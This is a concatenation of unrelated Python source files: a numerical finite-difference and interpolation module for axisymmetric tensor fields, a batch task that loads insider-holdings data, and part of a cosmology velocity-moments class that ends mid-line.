        :param entity: A reference to a managed entity.

        :param name: The name of the child object.

        '''
        return self.delegate("FindChild")(entity, name)
<gh_stars>1-10 r"""@package motsfinder.metric.discrete.numerical Numerical low-level computations and helpers. These are used by e.g. the .patch.DataPatch classes to perform their interpolation and differentiation on grids of data. """ import itertools from operator import add import numpy as np from scipy.interpolate import lagrange from ...numutils import NumericalError, nan_mat __all__ = [ "fd_xz_derivatives", ] # 1-D finite difference coefficients for first derivatives COEFFS_1ST = [ np.array([ -1., 0., 1. ]) / 2., # order=2 np.array([ 1., -8., 0., 8., -1. ]) / 12., # order=4 np.array([ -1., 9., -45., 0., 45., -9., 1. ]) / 60., # order=6 np.array([3., -32., 168., -672., 0., 672., -168., 32., -3.]) / 840., # order=8 ] # 1-D finite difference coefficients for second derivatives COEFFS_2ND = [ np.array([ 1., -2., 1. ]), # order=2 np.array([ -1., 16., -30., 16., -1. ]) / 12., # order=4 np.array([ 2., -27., 270., -490., 270., -27., 2. ]) / 180., # order=6 np.array([-9., 128., -1008., 8064., -14350., 8064., -1008., 128., -9.]) / 5040., # order=8 ] class GridDataError(Exception): r"""Raised if discrete data is not compatible with this module.""" pass def interpolate(mat, coords, linear=False, cache=None, base_idx=None): r"""Given a (small) matrix patch, interpolate a value between grid points. This takes the whole matrix patch supplied, i.e. the order of the interpolating polynomial is determined by the size of the patch. For example, if `mat` is a 5x5x5 matrix, 5 point Lagrange interpolation is performed. @param mat Patch to interpolate within. The size of the patch determines the order of the interpolating polynomials. @param coords Coordinates in relative index space at which to interpolate. Should be closest to the center grid point for best results. For example, if `mat` is a 5x5 matrix with indices ``mat[i,j], i=0,...,4, j=0,...,4``, then possible `coords` are ``coords = (1.8, 2.2)``. 
If the grid points correspond to physical coordinates, they should be translated into relative index space for this function. @param linear If `True`, ignore the patch size and do simple linear interpolation. Default is `False`. @param cache Optional dictionary to store and reuse interpolating Lagrange polynomials for the first axis of the matrix patch. If given, you also need to supply `base_idx`, which maps the patch back to the full matrix and allows the cache to be used for the whole data. @param base_idx Tuple of as many indices as `mat` has axes. This allows the optional cache to be applicable to the full data when supplying only small patches of it to this function. """ # "collapse" along each axis, one by one. try: for coord in coords: mat = _apply_along_first_axis(_interp1d, mat, coord, linear, cache, base_idx) cache = base_idx = None except (ValueError, IndexError) as e: raise NumericalError("%s" % e) return mat def _apply_along_first_axis(func, mat, *args, **kwargs): r"""Similar to np.apply_along_axis(), but call func with the fixed indices. In contrast to `np.apply_along_axis()`, `func` is called with the tuple `ii` of indices that are fixed in `mat` as second positional argument. This provides context for where the function is being evaluated in the matrix which may be used to implement e.g. caching mechanisms. """ shape = mat[1:] if isinstance(mat, tuple) else mat.shape[1:] out = np.zeros(shape) for ii in np.ndindex(out.shape): out[ii] = func(mat[np.index_exp[:] + ii], ii, *args, **kwargs) return out def _interp1d(arr, ii, coord, linear, cache=None, base_idx=None): r"""Perform 1-D interpolation of a sequence of values. This takes a 1-D sequence of values, `arr`, and interpolates a value in relative index space at `coord` as described in interpolate(). The order of the interpolating polynomial is determined by the length of the sequence. The result is a floating point value. @param arr 1-D array-like with values. 
@param ii In case a `cache` is used, the parameter `ii` should consist of indices that are *not* varied along the axis currently interpolated along. These are added to the last indices of `base_idx` to generate a unique key for the data of this axis, which will still be the same each time this strip of data is encountered (i.e. even if it is at a different position in the matrix patch currently considered). @param coord Float indicating the coordinate in relative index space at which to interpolate. @param linear If `True`, perform simple linear interpolation instead of Lagrange interpolation. @param cache Dictionary to use as cache. If given, `base_idx` must also be supplied. @param base_idx Tuple of as many indices as `mat` has axes. This allows the optional cache to be applicable to the full data. """ if arr.size == 1: return arr[0] if linear: i = int(abs(coord)) fa = arr[i] fb = arr[i+1] x = abs(coord) return fa + (x-i) * (fb - fa) else: if cache is not None: key = (base_idx[0],) + tuple(map(add, base_idx[1:], ii)) try: poly = cache[key] except KeyError: # This call is the most expensive one when evaluating # numerical data during a MOTS search. It might benefit # significantly from a faster (e.g. Cython) implementation. poly = lagrange(range(arr.size), arr) cache[key] = poly else: poly = lagrange(range(arr.size), arr) return poly(coord) def fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size=5): r"""Perform finite difference differentiation on specified grid points. Given a matrix `mat` containing values on a grid, this function approximates the first or second derivative for each grid point in the given `region` using 3-, 5-, 7- or 9-point stencils. Note that only `x` and `z` (and possibly mixed) derivatives are computed, even though `mat` needs to have three axes. @return For each element of `derivs`, a matrix of the shape of `region`. @param mat Matrix with the values to use. 
Must have at least ``(stencil_size-1)/2`` additional points in the first and third axes on the borders of the given `region`. @param region Region of grid points at which to compute the derivatives. Should consist of three iterables of indices, the tensor product of which defines the actual set of indices in the region. @param dx,dz Physical distance of grid points in coordinate space along the axes. @param derivs Derivative orders to compute. To compute the x-, z-, and x-z-derivatives, use ``derivs=([1, 0], [0, 1], [1, 1])``. @param stencil_size Number of grid points to consider (i.e. the "size" of the stencil). This determines the order of accuracy of the derivative computed. Allowed values currently are 3, 5, 7, 9. """ try: return _fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size) except (ValueError, IndexError) as e: raise NumericalError("%s" % e) def _fd_xz_derivatives(mat, region, dx, dz, derivs, stencil_size): r"""Implement fd_xz_derivatives().""" n = int((stencil_size-1)/2) if n != (stencil_size-1)/2 or n > len(COEFFS_1ST): raise ValueError("Unsupported stencil size: %s" % stencil_size) shape = [len(r) for r in region] coeffs1 = COEFFS_1ST[n - 1] coeffs2 = COEFFS_2ND[n - 1] i0, j0, k0 = [r[0] for r in region] results = [] for nx, nz in derivs: result = np.zeros(shape) for i, j, k in itertools.product(*region): if nx == 1 and nz == 0: result[i-i0, j-j0, k-k0] = 1/dx * ( mat[i-n:i+n+1, j, k].dot(coeffs1) ) elif nx == 0 and nz == 1: result[i-i0, j-j0, k-k0] = 1/dz * ( mat[i, j, k-n:k+n+1].dot(coeffs1) ) elif nx == 1 and nz == 1: result[i-i0, j-j0, k-k0] = 1/(dx*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs1).dot(coeffs1) ) elif nx == 2 and nz == 0: result[i-i0, j-j0, k-k0] = 1/dx**2 * ( mat[i-n:i+n+1, j, k].dot(coeffs2) ) elif nx == 0 and nz == 2: result[i-i0, j-j0, k-k0] = 1/dz**2 * ( mat[i, j, k-n:k+n+1].dot(coeffs2) ) elif nx == 2 and nz == 1: result[i-i0, j-j0, k-k0] = 1/(dx*dx*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs1).dot(coeffs2) ) 
elif nx == 1 and nz == 2: result[i-i0, j-j0, k-k0] = 1/(dx*dz*dz) * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs2).dot(coeffs1) ) elif nx == 2 and nz == 2: result[i-i0, j-j0, k-k0] = 1/(dx*dz)**2 * ( mat[i-n:i+n+1, j, k-n:k+n+1].dot(coeffs2).dot(coeffs2) ) else: raise NotImplementedError( "Derivative order not implemented: %s, %s" % (nx, nz) ) results.append(result) return results def eval_sym_axisym_matrix(comp_funcs, *lower_orders, point, diff=0): r"""Evaluate (derivatives of) a symmetric tensor field at a point. This takes the six independent component functions of the `xx`, `xy`, `xz`, `yy`, `yz`, and `zz` components (in that order) of a tensor field `T`. These should be DataPatch objects. It then computes the derivatives of the requested order `diff` in all three coordinate directions using the axisymmetry of the tensor to infer the y-derivatives from the x-derivative. In order to compute derivatives, all lower order derivatives are required (including order 0). These have to be supplied as positional arguments after the list of component functions. @return For ``diff=0``, returns the 3x3 matrix representing `T` interpolated at `point`, i.e. \f$T_{ij}\f$. If ``diff=1``, returns ``dT[i,j,k]``, where the indices mean \f$\partial_i T_{jk}\f$ and if ``diff=2``, returns ``ddT[i,j,k,l]`` with indices \f$\partial_i\partial_j T_{kl}\f$. @param comp_funcs An iterable of the six independent component functions (DataPatch) of the tensor field. @param *lower_orders Further positional arguments supplying the lower order derivatives. For `diff=0`, none should be supplied. For `diff=1`, one argument, `T` itself, should be given. For `diff=2`, `T` and `dT` should be given in that order. @param point The point at which to compute. @param diff Derivative order to compute. Default is `0`. @b Notes Based on the considerations in [1], the y-derivatives of tensor field components in the xz-plane can be computed by differentiating eq. (7) in [1] w.r.t. `y` and evaluating at `y=0`. 
The results are \f{eqnarray*}{ (\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2T_{xy} & T_{xx}-T_{yy} & -T_{yz} \\ T_{xx}-T_{yy} & 2T_{xy} & T_{xz} \\ -T_{yz} & T_{xz} & 0 \end{array}\right) \\ (\partial_x\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2T_{xy,x} + \frac{2 T_{xy}}{x} & T_{xx,x} - \frac{T_{xx}}{x} - T_{yy,x} + \frac{T_{yy}}{x} & - T_{yz,x} + \frac{T_{yz}}{x} \\ T_{xx,x}-T_{yy,x}-\frac{T_{xx}}{x} + \frac{T_{yy}}{x} & 2 T_{xy,x} - \frac{2 T_{xy}}{x} & T_{xz,x} - \frac{T_{xz}}{x} \\ -T_{yz,x}+\frac{T_{yz}}{x} & T_{xz,x} - \frac{T_{xz}}{x} & 0 \end{array}\right) \\ (\partial_y\partial_y T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} T_{xx,x}-\frac{2 T_{xx}}{x} + \frac{2 T_{yy}}{x} & T_{xy,x} - \frac{4 T_{xy}}{x} & T_{xz,x} - \frac{T_{xz}}{x}\\ T_{xy,x}-\frac{4 T_{xy}}{x} & \frac{2 T_{xx}}{x} + T_{yy,x} - \frac{2 T_{yy}}{x} & T_{yz,x} - \frac{T_{yz}}{x}\\ T_{xz,x}-\frac{T_{xz}}{x} & T_{yz,x} - \frac{T_{yz}}{x} & T_{zz,x} \end{array}\right) \\ (\partial_y\partial_z T_{ij}) &=& \frac1x \left(\begin{array}{@{}ccc@{}} -2 T_{xy,z} & T_{xx,z}-T_{yy,z} & -T_{yz,z}\\ T_{xx,z}-T_{yy,z} & 2 T_{xy,z} & T_{xz,z}\\ -T_{yz,z} & T_{xz,z} & 0 \end{array}\right). \f} Note that since we don't transform the derivative but use eq. (7) as defining `T` for ``y != 0``, the rotation matrices `R` have to be taken as dependent on `y` and not as rigid rotations. @b References [1] <NAME>, et al. "Symmetry without symmetry: Numerical simulation of axisymmetric systems using Cartesian grids." International Journal of Modern Physics D 10.03 (2001): 273-289. 
""" if diff == 0: T00, T01, T02, T11, T12, T22 = [ Tij.interpolate(point) for Tij in comp_funcs ] return np.array([[T00, T01, T02], [T01, T11, T12], [T02, T12, T22]]) if diff == 1: T, = lower_orders ( (T00x, T00z), (T01x, T01z), (T02x, T02z), (T11x, T11z), (T12x, T12z), (T22x, T22z) ) = [ Tij.diff(point, diff=1) for Tij in comp_funcs ] Tx = np.array([[T00x, T01x, T02x], [T01x, T11x, T12x], [T02x, T12x, T22x]]) Tz = np.array([[T00z, T01z, T02z], [T01z, T11z, T12z], [T02z, T12z, T22z]]) Ty = _get_Ty(point, T, dTdx=Tx) return np.asarray([Tx, Ty, Tz]) if diff == 2: T, dT = lower_orders ( (T00xx, T00zz, T00xz), (T01xx, T01zz, T01xz), (T02xx, T02zz, T02xz), (T11xx, T11zz, T11xz), (T12xx, T12zz, T12xz), (T22xx, T22zz, T22xz), ) = [ Tij.diff(point, diff=2) for Tij in comp_funcs ] Txx = np.array([[T00xx, T01xx, T02xx], [T01xx, T11xx, T12xx], [T02xx, T12xx, T22xx]]) Tzz = np.array([[T00zz, T01zz, T02zz], [T01zz, T11zz, T12zz], [T02zz, T12zz, T22zz]]) Txz = np.array([[T00xz, T01xz, T02xz], [T01xz, T11xz, T12xz], [T02xz, T12xz, T22xz]]) Txy, Tyy, Tyz = _get_Txy_Tyy_Tyz(point, T, dT) return np.asarray([[Txx, Txy, Txz], [Txy, Tyy, Tyz], [Txz, Tyz, Tzz]]) raise ValueError("Unknown `diff` value: %s" % diff) def _get_fy(): r"""Compute the y-derivative of scalar f in x-z-plane assuming axisymmetry.""" return 0. def _get_fxy_fyy_fyz(point, df): r"""Compute the 2nd (y-)derivatives of scalar f in x-z-plane assuming axisymmetry.""" x = point[0] fx = df[0] fxy = fyz = 0. 
    # (tail of _get_fxy_fyy_fyz, whose def/docstring precede this span)
    if x == 0:
        # fyy = f_x / x is singular on the axis; L'Hospital is not applied
        # here, so signal "undefined" explicitly.
        fyy = np.nan
    else:
        fyy = fx/x
    return fxy, fyy, fyz


def _get_Vy(point, V):
    r"""Compute the y-derivative of vector V in x-z-plane assuming axisymmetry.

    @param point Cartesian point in the xz-plane; only ``point[0]`` (the
        x-coordinate) is used.
    @param V The three vector components evaluated at `point`.
    @return 3-vector of ``partial_y V_i``. On the axis (``x == 0``) the 1/x
        formula is singular and a NaN-filled vector is returned instead.
    """
    x = point[0]
    if x == 0:
        Vy = nan_mat((3,))
    else:
        # Rotate-and-differentiate result for an axisymmetric vector field:
        # only the x- and y-components mix under a y-derivative at y=0.
        Vy = 1/x * np.array([-V[1], V[0], 0.])
    return Vy


def _get_Vxy_Vyy_Vyz(point, V, dV):
    r"""Compute the 2nd (y-)derivatives of vector V in x-z-plane assuming axisymmetry.

    @param point Cartesian point in the xz-plane; only ``point[0]`` is used.
    @param V The three vector components at `point`.
    @param dV First derivatives with convention ``dV[i,j] == partial_i V^j``.
    @return Tuple ``(Vxy, Vyy, Vyz)`` of 3-vectors holding the mixed second
        derivatives ``partial_x partial_y V``, ``partial_y^2 V``,
        ``partial_y partial_z V``. NaN-filled on the axis (``x == 0``).
    """
    x = point[0]
    # pylint: disable=unsubscriptable-object
    if x == 0:
        # 1/x formulas below are singular on the axis.
        Vxy = nan_mat((3,))
        Vyy = nan_mat((3,))
        Vyz = nan_mat((3,))
    else:
        # note: dV[i,j] == partial_i V^j == V^j_{,i}
        Vxy = 1/x * np.array([V[1]/x - dV[0,1], -V[0]/x + dV[0,0], 0.])
        Vyy = 1/x * np.array([-V[0]/x + dV[0,0], -V[1]/x + dV[0,1], dV[0,2]])
        Vyz = 1/x * np.array([-dV[2,1], dV[2,0], 0.])
    return Vxy, Vyy, Vyz


def _get_Ty(point, T, dTdx=None):
    r"""Compute the y-derivative of matrix T in x-z-plane assuming axisymmetry.

    Here, `T = (T_ij)` is a matrix-valued function (covariant tensor field).
    See docstring of eval_sym_axisym_matrix() for the implemented formulas.

    @param point Cartesian point in the xz-plane; only ``point[0]`` is used.
    @param T The 3x3 (symmetric) tensor components at `point`.
    @param dTdx Optional x-derivative ``partial_x T_ij``; required to resolve
        the on-axis limit via L'Hospital. If omitted on the axis, a NaN
        matrix is returned.
    @return 3x3 matrix of ``partial_y T_ij``.
    """
    x = point[0]
    T = np.asarray(T)
    if x == 0:
        # From the symmetries of an axisymmetric tensor in Cartesian
        # coordinates, some components are trivially zero:
        #   \partial_y {Txx, Tyy, Tzz, Txy} = 0
        # For the remaining components Txz, Tyz we use L'Hospital's rule.
        if dTdx is None:
            return nan_mat(T.shape)
        dy_Txz = -dTdx[1,2]
        dy_Tyz = dTdx[0,2]
        return np.array([
            [0.0, 0.0, dy_Txz],
            [0.0, 0.0, dy_Tyz],
            [dy_Txz, dy_Tyz, 0.0],
        ])
    # Off-axis: direct evaluation of the (\partial_y T_ij) formula quoted in
    # the eval_sym_axisym_matrix() docstring.
    return np.array([[-2*T[0,1]/x, (T[0,0]-T[1,1])/x, -T[1,2]/x],
                     [(T[0,0]-T[1,1])/x, 2*T[0,1]/x, T[0,2]/x],
                     [-T[1,2]/x, T[0,2]/x, 0.]])


def _get_Txy_Tyy_Tyz(point, T, dT):
    r"""Compute the 2nd (y-)derivatives of matrix T in x-z-plane assuming axisymmetry.

    Here, `T = (T_ij)` is a matrix-valued function (covariant tensor field).
    The derivatives are those involving the y-direction, i.e. `x,y`, `y,y`,
    `y,z`, in that order. See docstring of eval_sym_axisym_matrix() for the
    implemented formulas.
""" x = point[0] T = np.asarray(T) dT = np.asarray(dT) if x == 0: Txy = nan_mat((3, 3)) Tyy = nan_mat((3, 3)) Tyz = nan_mat((3, 3)) else: Txy = 1/x * np.array([ [2 * (T[0,1]/x - dT[0,0,1]), dT[0,0,0] - dT[0,1,1] + (T[1,1]-T[0,0])/x, T[1,2]/x - dT[0,1,2]], [0, 2 * (dT[0,0,1] - T[0,1]/x), dT[0,0,2] - T[0,2]/x], [0, 0, 0] ]) _sym3x3(Txy) Tyy = 1/x * np.array([ [dT[0,0,0] - 2 * (T[0,0]-T[1,1])/x, dT[0,0,1] - 4 * T[0,1]/x, dT[0,0,2] - T[0,2]/x], [0, 2 * (T[0,0] - T[1,1])/x + dT[0,1,1], dT[0,1,2]-T[1,2]/x], [0, 0, dT[0,2,2]] ]) _sym3x3(Tyy) Tyz = 1/x * np.array([ [-2*dT[2,0,1], dT[2,0,0]-dT[2,1,1], -dT[2,1,2]], [0, 2*dT[2,0,1], dT[2,0,2]], [0, 0, 0] ]) _sym3x3(Tyz) return Txy, Tyy, Tyz def _sym3x3(T): r"""Symmetrize a 3x3 matrix by replacing the lower-left three components.""" T[1,0], T[2,0], T[2,1] = T[0,1], T[0,2], T[1,2]
from serenity.data.batch.load_sharadar_tickers import LoadSharadarTickersTask
from serenity.data.batch.utils import LoadSharadarTableTask, ExportQuandlTableTask
from serenity.data.sharadar_api import clean_nulls, yes_no_to_bool
from serenity.data.sharadar_holdings import FormType, SecurityAdType, TransactionType, SecurityTitleType, \
    InsiderHoldings
from serenity.data.sharadar_refdata import Ticker


# noinspection DuplicatedCode
class LoadInsiderHoldingsTask(LoadSharadarTableTask):
    """Luigi-style batch task that loads the Sharadar SF2 insider-holdings
    table into the local database, upserting one InsiderHoldings row per
    exported CSV row."""

    def requires(self):
        # Upstream dependencies: reference tickers must be loaded first, and
        # the SF2 table must be exported from Quandl for the same date window.
        return [
            LoadSharadarTickersTask(start_date=self.start_date, end_date=self.end_date),
            ExportQuandlTableTask(table_name=self.get_workflow_name(), date_column='filingdate',
                                  start_date=self.start_date, end_date=self.end_date)
        ]

    def process_row(self, index, row):
        """Upsert a single SF2 row.

        Extracts and normalizes all columns (empty/NULL markers via
        clean_nulls, Y/N flags via yes_no_to_bool, code columns resolved to
        reference entities via get_or_create), then either creates a new
        InsiderHoldings entity or updates the mutable fields of an existing
        one keyed on (ticker, filing date, owner, form type, row number).
        """
        ticker_code = row['ticker']
        ticker = Ticker.find_by_ticker(self.session, ticker_code)
        filing_date = row['filingdate']
        form_type_code = row['formtype']
        form_type = FormType.get_or_create(self.session, form_type_code)
        issuer_name = row['issuername']
        owner_name = row['ownername']
        officer_title = row['officertitle']
        is_director = yes_no_to_bool(row['isdirector'])
        is_officer = yes_no_to_bool(row['isofficer'])
        is_ten_percent_owner = yes_no_to_bool(row['istenpercentowner'])
        transaction_date = clean_nulls(row['transactiondate'])
        security_ad_type_code = clean_nulls(row['securityadcode'])
        security_ad_type = SecurityAdType.get_or_create(self.session, security_ad_type_code)
        transaction_type_code = clean_nulls(row['transactioncode'])
        transaction_type = TransactionType.get_or_create(self.session, transaction_type_code)
        shares_owned_before_transaction = clean_nulls(row['sharesownedbeforetransaction'])
        transaction_shares = clean_nulls(row['transactionshares'])
        shares_owned_following_transaction = clean_nulls(row['sharesownedfollowingtransaction'])
        transaction_price_per_share = clean_nulls(row['transactionpricepershare'])
        transaction_value = clean_nulls(row['transactionvalue'])
        security_title_type_code = clean_nulls(row['securitytitle'])
        security_title_type = SecurityTitleType.get_or_create(self.session, security_title_type_code)
        direct_or_indirect = clean_nulls(row['directorindirect'])
        nature_of_ownership = clean_nulls(row['natureofownership'])
        date_exercisable = clean_nulls(row['dateexercisable'])
        price_exercisable = clean_nulls(row['priceexercisable'])
        expiration_date = clean_nulls(row['expirationdate'])
        row_num = row['rownum']

        # Natural key for upsert: one SF2 filing line item.
        holdings = InsiderHoldings.find(self.session, ticker_code, filing_date, owner_name, form_type, row_num)
        if holdings is None:
            holdings = InsiderHoldings(ticker_code=ticker_code, ticker=ticker, filing_date=filing_date,
                                       form_type=form_type, issuer_name=issuer_name, owner_name=owner_name,
                                       officer_title=officer_title, is_director=is_director, is_officer=is_officer,
                                       is_ten_percent_owner=is_ten_percent_owner, transaction_date=transaction_date,
                                       security_ad_type=security_ad_type, transaction_type=transaction_type,
                                       shares_owned_before_transaction=shares_owned_before_transaction,
                                       transaction_shares=transaction_shares,
                                       shares_owned_following_transaction=shares_owned_following_transaction,
                                       transaction_price_per_share=transaction_price_per_share,
                                       transaction_value=transaction_value, security_title_type=security_title_type,
                                       direct_or_indirect=direct_or_indirect, nature_of_ownership=nature_of_ownership,
                                       date_exercisable=date_exercisable, price_exercisable=price_exercisable,
                                       expiration_date=expiration_date, row_num=row_num)
        else:
            # Refresh mutable fields on re-load. Key fields (ticker_code,
            # filing_date, owner_name, form_type, row_num) are left alone.
            # NOTE(review): security_ad_type, transaction_type,
            # transaction_value, security_title_type and the exercisable/
            # expiration fields are NOT refreshed here although they are set
            # on insert — confirm whether that omission is intentional.
            holdings.ticker = ticker
            holdings.issuer_name = issuer_name
            holdings.officer_title = officer_title
            holdings.is_director = is_director
            holdings.is_officer = is_officer
            holdings.is_ten_percent_owner = is_ten_percent_owner
            holdings.transaction_date = transaction_date
            holdings.shares_owned_before_transaction = shares_owned_before_transaction
            holdings.transaction_shares = transaction_shares
            holdings.shares_owned_following_transaction = shares_owned_following_transaction
            holdings.transaction_price_per_share = transaction_price_per_share
            holdings.transaction_value = transaction_value
            holdings.security_title_type = security_title_type
            holdings.direct_or_indirect = direct_or_indirect
            holdings.nature_of_ownership = nature_of_ownership
            holdings.date_exercisable = date_exercisable
            holdings.price_exercisable = price_exercisable
            holdings.expiration_date = expiration_date

        # session.add is a no-op for entities already in the identity map,
        # so it is safe for both the insert and update branches.
        self.session.add(holdings)

    def get_workflow_name(self):
        # Sharadar SF2 = insider holdings dataset.
        return 'SHARADAR/SF2'
<reponame>kokron/velocileptors import numpy as np import time from scipy.interpolate import interp1d from velocileptors.Utils.loginterp import loginterp from velocileptors.Utils.spherical_bessel_transform_fftw import SphericalBesselTransform from velocileptors.Utils.qfuncfft import QFuncFFT from velocileptors.LPT.cleft_fftw import CLEFT class VelocityMoments(CLEFT): ''' Class based on cleft_fftw to compute pairwise velocity moments. ''' def __init__(self, *args, beyond_gauss = False, **kw): ''' If beyond_gauss = True computes the third and fourth moments, otherwise default is to enable calculation of P(k), v(k) and sigma(k). Other keywords the same as the cleft_fftw class. Go look there! ''' # Set up the configuration space quantities CLEFT.__init__(self, *args, **kw) self.beyond_gauss = beyond_gauss self.setup_onedot() self.setup_twodots() # v12 and sigma12 only have a subset of the bias contributions so we don't need to have as many FFTs if self.third_order: self.num_vel_components = 8; self.vii = np.array([0,1,2,3,4,6,7,10]) + 1 self.num_spar_components = 5; self.sparii = np.array([0,1,2,3,6]) + 1 self.num_strace_components = 5; self.straceii = np.array([0,1,2,3,6]) + 1 elif self.shear: self.num_vel_components = 7; self.vii = np.array([0,1,2,3,4,6,7]) + 1 self.num_spar_components = 5; self.sparii = np.array([0,1,2,3,6]) + 1 self.num_strace_components = 5; self.straceii = np.array([0,1,2,3,6]) + 1 else: self.num_vel_components = 5; self.vii = np.array([0,1,2,3,4]) + 1 self.num_spar_components = 4; self.sparii = np.array([0,1,2,3]) + 1 self.num_strace_components = 4; self.straceii = np.array([0,1,2,3]) + 1 self.sph_v = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_vel_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) self.sph_spar = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_spar_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = 
self.wisdom_file) self.sph_strace = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_strace_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) if self.beyond_gauss: # Beyond the first two moments self.num_gamma_components = 2; self.gii = np.array([0,1]) + 1 # gamma has matter (all loop, so lump into 0) and b1 self.sph_gamma1 = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_gamma_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) self.sph_gamma2 = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_gamma_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) # fourth moment self.num_kappa_components = 3; self.kii = np.array([0,1,2]) + 1 # note that these are not the bias comps self.sph_kappa = SphericalBesselTransform(self.qint, L=self.jn, ncol=(self.num_kappa_components), threads=self.threads, import_wisdom= self.import_wisdom, wisdom_file = self.wisdom_file) def update_power_spectrum(self,k,p): ''' Same as the one in cleft_fftw but also do the velocities. ''' super(VelocityMoments,self).update_power_spectrum(k,p) self.setup_onedot() self.setup_twodots() self.setup_threedots() def setup_onedot(self): ''' Create quantities linear in f. All quantities are with f = 1, since converting back is trivial. ''' self.Xdot = self.Xlin; self.sigmadot = self.Xdot[-1] self.Ydot = self.Ylin self.Vdot = 4./3 * self.Vloop # these are only the symmetrized version since all we need... 
self.Tdot = 4./3 * self.Tloop # is k_i k_j k_k W_{ijk} self.Udot = self.Ulin self.Uloopdot = 3 * self.U3 self.U11dot = 2 * self.U11 self.U20dot = 2 * self.U20 # some one loop terms have to be explicitly set to zero if self.one_loop: self.Xloopdot = (4 * self.qf.Xloop13 + 2 * self.qf.Xloop22) * self.one_loop; self.sigmaloopdot = self.Xloopdot[-1] self.Yloopdot = (4 * self.qf.Yloop13 + 2 * self.qf.Yloop22) * self.one_loop self.X10dot = 1.5 * self.X10; self.sigma10dot = self.X10dot[-1] self.Y10dot = 1.5 * self.Y10 else: self.Xloopdot = 0; self.sigmaloopdot = 0 self.Yloopdot = 0 self.X10dot = 0; self.sigma10dot = 0 self.Y10dot = 0 if self.shear: self.Us2dot = 2 * self.Us2 self.V12dot = self.V self.Xs2dot = self.Xs2; self.sigmas2dot = self.Xs2dot[-1] self.Ys2dot = self.Ys2 if self.third_order: self.Ub3dot = self.Ub3 def setup_twodots(self): ''' Same as onedot but now for those quadratic in f. ''' self.Xddot = self.Xlin; self.sigmaddot = self.Xddot[-1] self.Yddot = self.Ylin # Here we will need two forms, one symmetrized: self.Vddot = 5./3 * self.Vloop #these are only the symmetrized version since all we need... 
self.Tddot = 5./3 * self.Tloop # is k_i k_j k_k W_{ijk} # Explicitly set certain terms to zero if not one loop if self.one_loop: self.Xloopddot = (4 * self.qf.Xloop22 + 6 * self.qf.Xloop13) * self.one_loop; self.sigmaloopddot = self.Xloopddot[-1] self.Yloopddot = (4 * self.qf.Yloop22 + 6 * self.qf.Yloop13) * self.one_loop self.X10ddot = 2 * self.X10; self.sigma10ddot = self.X10ddot[-1] self.Y10ddot = 2 * self.Y10 # and the other from k_i \delta_{jk} \ddot{W}_{ijk} self.kdelta_Wddot = (18 * self.qf.V1loop112 + 7 * self.qf.V3loop112 + 5 * self.qf.Tloop112) * self.one_loop else: self.Xloopddot = 0; self.sigmaloopddot = 0 self.Yloopddot = 0 self.X10ddot = 0; self.sigma10ddot = 0 self.Y10ddot = 0 self.kdelta_Wddot = 0 if self.shear: self.Xs2ddot = self.Xs2; self.sigmas2ddot = self.Xs2ddot[-1] self.Ys2ddot = self.Ys2 def setup_threedots(self): self.Vdddot = 2 * self.Vloop self.Tdddot = 2 * self.Tloop def v_integrals(self,k): ''' Gives bias contributions to v(k) at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_vel_components) bias_integrands = np.zeros( (self.num_vel_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. 
- 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 bias_integrands[0,:] = k * (self.Xdot + self.Xloopdot + mu2fac * (self.Ydot + self.Yloopdot)) - 0.5 * ksq * (mu1fac * self.Vdot + mu3fac * self.Tdot) # matter bias_integrands[1,:] = 2* (-ksq * self.Ulin * (mu1fac*self.Xdot + mu3fac * self.Ydot) + mu1fac * (self.Udot + self.Uloopdot) + k * (self.X10dot + mu2fac * self.Y10dot) ) # b1 bias_integrands[2,:] = 2*k*mu2fac*self.Ulin*self.Udot + mu1fac*self.U11dot + k * self.corlin * (self.Xdot + self.Ydot * mu2fac) # b1sq bias_integrands[3,:] = 2*k*self.Ulin*self.Udot * mu2fac + self.U20dot * mu1fac # b2 bias_integrands[4,:] = 2 * self.corlin * self.Udot * mu1fac# b1b2 if self.shear or self.third_order: bias_integrands[5,:] = 2*self.Us2dot*mu1fac + 2*k * (self.Xs2dot + mu2fac * self.Ys2dot) #bs: the second factor used to miss a factor of two bias_integrands[6,:] = 2*self.V12dot*mu1fac #b1 bs if self.third_order: bias_integrands[7,:] = 2*self.Ub3dot * mu1fac # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_v.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def spar_integrals(self,k): ''' Gives bias contributions to \sigma_\parallel at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_spar_components) bias_integrands = np.zeros( (self.num_spar_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 